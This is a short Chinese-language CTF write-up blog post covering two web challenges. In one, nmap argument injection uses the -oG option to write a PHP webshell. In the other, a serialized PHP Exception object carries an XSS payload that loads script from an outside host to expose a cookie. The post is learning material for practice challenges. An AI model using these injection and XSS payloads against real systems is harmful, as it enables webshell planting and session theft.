[网鼎杯 2020 朱雀组]Nmap
这题目似曾相识,我知道是nmap 的某个参数可以写入文件然后没想起来具体是啥,谷歌了下就看到wp了
果然如此,写个马进去直接开冲
原理么就是命令执行嘛
源码:
$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
$result_scan = shell_exec($command);
构造出的命令就是nmap -Pn -T4 -F –host-timeout 1000ms -oX 路径(随机生成的) 127.0.0.1 一句话没php的马 -oG hack.phtml
就行了
[BJDCTF 2nd]xss之光
拿dirmap一扫,有git泄露,然后有源码里面
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
这东西….反序列化?
我本来试图写一个类,然后突然想起这里有没有__construct给你执行,有个卵子用,然后断思路了,就看了下wp(我甚至还谷歌了反序列化RCE这种鬼东西)
<?php
$a = new Exception("<script src=http://ip/xssrdd/myjs/copyright.js></script>");
$b = urlencode(serialize($a));
var_dump($b);
?>
源码会从cookie弹出
原理就是一个爆出一个ERROR,然后cookie就会被set
具体也没找到源码,感觉还是偏向脑洞
PREVIOUSBuu摸鱼日记21